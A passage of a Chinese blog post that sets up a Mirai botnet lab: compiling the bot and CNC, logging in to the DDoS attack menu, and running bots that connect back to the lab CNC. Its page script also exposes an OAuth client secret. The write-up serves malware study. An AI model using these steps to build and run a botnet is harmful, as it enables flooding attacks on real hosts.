<h3 id="编译木马和cnc"><a href="#编译木马和cnc" class="headerlink" title="编译木马和cnc"></a>编译木马和cnc</h3><p>进入目录<code>mirai</code>中，执行<code>build.sh debug telnet</code>，此时使用的是debug模式，编译出来的bot不支持Telnet弱口令扫描，在实际的运用场景中使用<code>build.sh release telnet</code>。报错<code>arm6l-gcc not found</code>无所谓，只是这个交叉编译器没找到而已，可忽略，如果实际场景中非要编译出该架构的bot，也可以去找到相关的编译器并添加到PATH中。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai on git:comments x [22:35:17]</span><br><span class="line">$ ./build.sh debug telnet</span><br><span class="line">./build.sh: line 54: armv6l-gcc: command not found</span><br></pre></td></tr></table></figure>
<p>编译出来的结果如下，在<code>debug</code>目录中，<code>mirai.*</code>是真正的木马bot，<code>cnc</code>是运行到cnc服务器上，<code>scanListen</code>是监听bot弱口令爆破成功的返回结果。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai on git:comments x [22:56:37]</span><br><span class="line">$ tree -L 1 debug</span><br><span class="line">debug</span><br><span class="line">├── badbot</span><br><span class="line">├── cnc</span><br><span class="line">├── enc</span><br><span class="line">├── mirai.arm</span><br><span class="line">├── mirai.dbg</span><br><span class="line">├── mirai.mips</span><br><span class="line">├── mirai.sh4</span><br><span class="line">├── nogdb</span><br><span class="line">└── scanListen</span><br><span class="line"></span><br><span class="line">0 directories, 9 files</span><br></pre></td></tr></table></figure>
<h3 id="运行cnc，并上线木马"><a href="#运行cnc，并上线木马" class="headerlink" title="运行cnc，并上线木马"></a>运行cnc，并上线木马</h3><p>在<code>mirai.cnc</code>上运行cnc，cnc会监听23端口，等待攻击者连接并进行验证，返回控制台：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-cnc in ~/app/Mirai-Source-Code/mirai on git:comments x [22:59:01] C:130</span><br><span class="line">$ sudo ./debug/cnc</span><br><span class="line">[sudo] password for utest:</span><br><span class="line">Mysql DB opened</span><br></pre></td></tr></table></figure>
<p>使用任意一台机器登陆到cnc：<code>telnet mirai.cnc</code>，输入之前配置的账号<code>mirai-user</code>、密码<code>mirai-password</code>，便可以进入控制台。登陆成功后，输入<code>?</code>可以查看到僵尸网络支持的攻击方式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">я люблю куриные наггетсы</span><br><span class="line">пользователь: mirai-user</span><br><span class="line">пароль: **************</span><br><span class="line"></span><br><span class="line">проверив счета... |</span><br><span class="line">[+] DDOS | Succesfully hijacked connection</span><br><span class="line">[+] DDOS | Masking connection from utmp+wtmp...</span><br><span class="line">[+] DDOS | Hiding from netstat...</span><br><span class="line">[+] DDOS | Removing all traces of LD_PRELOAD...</span><br><span class="line">[+] DDOS | Wiping env libc.poison.so.1</span><br><span class="line">[+] DDOS | Wiping env libc.poison.so.2</span><br><span class="line">[+] DDOS | Wiping env libc.poison.so.3</span><br><span class="line">[+] DDOS | Wiping env libc.poison.so.4</span><br><span class="line">[+] DDOS | Setting up virtual terminal...</span><br><span class="line">[!] Sharing access IS prohibited!</span><br><span class="line">[!] Do NOT share your credentials!</span><br><span class="line">Ready</span><br><span class="line">mirai-user@botnet# ?</span><br><span class="line">Available attack list</span><br><span class="line">udp: UDP flood</span><br><span class="line">ack: ACK flood</span><br><span class="line">stomp: TCP stomp flood</span><br><span class="line">greip: GRE IP flood</span><br><span class="line">http: HTTP flood</span><br><span class="line">vse: Valve source engine specific flood</span><br><span class="line">dns: DNS resolver flood using the targets domain, input IP is ignored</span><br><span class="line">syn: SYN flood</span><br><span class="line">greeth: GRE Ethernet flood</span><br><span class="line">udpplain: UDP flood with less options. optimized for higher PPS</span><br></pre></td></tr></table></figure>
<p>将木马放到mirai-client1和mirai-client2上运行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"># utest @ mirai-client1 in ~ [7:15:15]</span><br><span class="line">$ ./mirai.dbg</span><br><span class="line">DEBUG MODE YO</span><br><span class="line">[main] We are the only process on this system!</span><br><span class="line">listening tun0</span><br><span class="line">[main] Attempting to connect to CNC</span><br><span class="line">[killer] Trying to kill port 23</span><br><span class="line">[killer] Finding and killing processes holding port 23</span><br><span class="line">Failed to find inode for port 23</span><br><span class="line">[killer] Failed to kill port 23</span><br><span class="line">[killer] Bound to tcp/23 (telnet)</span><br><span class="line">[resolv] Got response from select</span><br><span class="line">[resolv] Found IP address: 650010ac</span><br><span class="line">Resolved mirai.cnc to 1 IPv4 addresses</span><br><span class="line">[main] Resolved domain</span><br><span class="line">[main] Connected to CNC. Local address = 335548588</span><br><span class="line">[main] Lost connection with CNC (errno = 9) 2</span><br><span class="line">[main] Tearing down connection to CNC!</span><br><span class="line">[main] Attempting to connect to CNC</span><br><span class="line">[resolv] Got response from select</span><br><span class="line">[resolv] Found IP address: 650010ac</span><br><span class="line">Resolved mirai.cnc to 1 IPv4 addresses</span><br><span class="line">[main] Resolved domain</span><br><span class="line">[main] Connected to CNC. Local address = 335548588</span><br><span class="line">[main] Lost connection with CNC (errno = 9) 2</span><br><span class="line">[main] Tearing down connection to CNC!</span><br><span class="line">[main] Attempting to connect to CNC</span><br><span class="line">[resolv] Got response from select</span><br><span class="line">[resolv] Found IP address: 650010ac</span><br><span class="line">Resolved mirai.cnc to 1 IPv4 addresses</span><br><span class="line">[main] Resolved domain</span><br><span class="line">[main] Connected to CNC. Local address = 335548588</span><br><span class="line">[killer] Detected we are running out of `/home/utest/mirai.dbg`</span><br><span class="line">[killer] Memory scanning processes</span><br><span class="line">[table] Tried to access table.11 but it is locked</span><br><span class="line">Got SIGSEGV at address: 0x0</span><br></pre></td></tr></table></figure>
<p>此时就可以在登陆cnc的终端上看到连接的bot数量：<br><img src="/images/Pastedimage20221222155435.png" alt="undifined"></p>
<p>至此，mirai的环境搭建基本完成。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/mirai/" rel="tag"># mirai</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/11/01/idapython-%E5%9F%BA%E7%A1%80/" rel="prev" title="idapython-基础">
      <i class="fa fa-chevron-left"></i> idapython-基础
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E5%AE%9E%E6%88%98%E7%9C%9F%E5%AE%9Emirai%E6%A0%B7%E6%9C%AC1-%E6%9C%89%E7%AC%A6%E5%8F%B7/" rel="next" title="mirai源码分析：实战真实mirai样本1-有符号">
      mirai源码分析：实战真实mirai样本1-有符号 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83%E8%AF%B4%E6%98%8E"><span class="nav-number">1.</span> <span class="nav-text">实验环境说明</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B1%80%E5%9F%9F%E7%BD%91%E8%AE%BE%E7%BD%AEDNS%E8%A7%A3%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">局域网设置DNS解析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mirai-cnc%E9%85%8D%E7%BD%AE"><span class="nav-number">3.</span> <span class="nav-text">mirai-cnc配置</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AE%BE%E7%BD%AEcnc%E5%9B%9E%E8%BF%9E%E5%8A%A0%E5%AF%86"><span class="nav-number">3.1.</span> <span class="nav-text">设置cnc回连加密</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%85%8D%E7%BD%AE%E4%BA%A4%E5%8F%89%E7%BC%96%E8%AF%91"><span class="nav-number">3.2.</span> <span class="nav-text">配置交叉编译</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E9%85%8D%E7%BD%AE"><span class="nav-number">3.3.</span> <span class="nav-text">数据库配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%96%E8%AF%91%E6%9C%A8%E9%A9%AC%E5%92%8Ccnc"><span class="nav-number">3.4.</span> <span class="nav-text">编译木马和cnc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%90%E8%A1%8Ccnc%EF%BC%8C%E5%B9%B6%E4%B8%8A%E7%BA%BF%E6%9C%A8%E9%A9%AC"><span class="nav-number">3.5.</span> <span class="nav-text">运行cnc，并上线木马</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">OneShell</p>
  <div class="site-description" itemprop="description">stay hungry, stay foolish</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">OneShell</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'd364449d44c374dab007',
      clientSecret: 'bb821aa84a81e3bd904d059c6e9ec7eb0e1cab4f',
      repo        : 'BlogComments',
      owner       : 'NoneShell',
      admin       : ['NoneShell'],
      id          : '631e3935a3f55f5e8557269b1cb0fb5d',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
